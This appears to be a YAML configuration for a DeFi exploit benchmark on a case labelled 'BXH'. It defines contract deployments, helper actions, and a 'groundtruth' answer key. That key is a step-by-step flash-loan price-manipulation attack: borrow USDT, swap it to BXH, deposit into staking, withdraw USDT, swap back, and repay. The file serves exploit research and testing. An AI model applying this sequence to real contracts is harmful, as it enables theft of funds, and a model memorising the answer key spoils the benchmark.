# Information for benchmarks building.
project_name: "BXH"

ctrt_name2cls:
  - ["bxh", "BXH"]
  - ["usdt", "USDT"]
  - ["pair", "UniswapV2Pair"]
  - ["factory", "UniswapV2Factory"]
  - ["router", "UniswapV2Router"]
  - ["bxhstaking", "BXHStaking"]

ctrt_name2deploy:
  - ["bxh", "new BXH()"]
  - ["usdt", ""]
  - ["pair", ""]
  - ["factory", ""]
  - ["router", ""]
  - [
      "bxhstaking",
      "new BXHStaking(
      address(bxh),
      1 ether,
      block.timestamp,
      1000,
      owner,
      address(usdt),
      address(pair)
      )",
    ]

extra_actions:
  - "function deposit_bxhstaking_bxh_bxhslp(uint256 amount) internal eurus {
    bxh.approve(address(bxhstaking), amount);
    bxhstaking.deposit(0, amount);
    }"

  - "function withdraw_bxhstaking_bxhslp_usdt(uint256 amount) internal eurus {
    bxhstaking.deposit(0, 0);
    }"

extra_deployments:
  - "usdt.transfer(address(bxhstaking), 200000 ether);"
extra_statements: []

attack_goal_str: "usdt"

groundtruth:
  - ["borrow", "usdt", "owner", "3110000e18"]
  - ["swap", "pair", "attacker", "usdt", "bxh", "3110000e18", "pair.getAmountOut(3110000e18, address(usdt))"]
  - ["deposit", "bxhstaking", "bxh", "bxhslp", "5582e18"]
  - ["withdraw", "bxhstaking", "bxhslp", "usdt", "0"]
  - ["swap", "pair", "attacker", "bxh", "usdt", "bxh.balanceOf(attacker)", "pair.getAmountOut(bxh.balanceOf(attacker), address(bxh))"]
  - ["payback", "usdt", "owner", "3110000e18 * 1003 / 1000"]

# Information for search space building.
roles:
  "usdt":
    is_asset: true
    is_erc20: true
    is_stablecoin: true
  "bxh":
    is_asset: true
    is_erc20: true
    is_stablecoin: false
  "pair":
    is_swappair: true
    is_uniswap: true
    token_pair: ["usdt", "bxh"]
    support_swaps:
      "usdt": ["bxh", "usdt"]
      "bxh": ["bxh", "usdt"]
    is_oracle: true
    oracle: "pair"
    is_lendpool: true

  "bxhstaking":
    is_defientry: true
    hacked_assets: ["bxh"]

  "bxhslp":
    is_asset: true

pattern: "BuySell Manipulation"
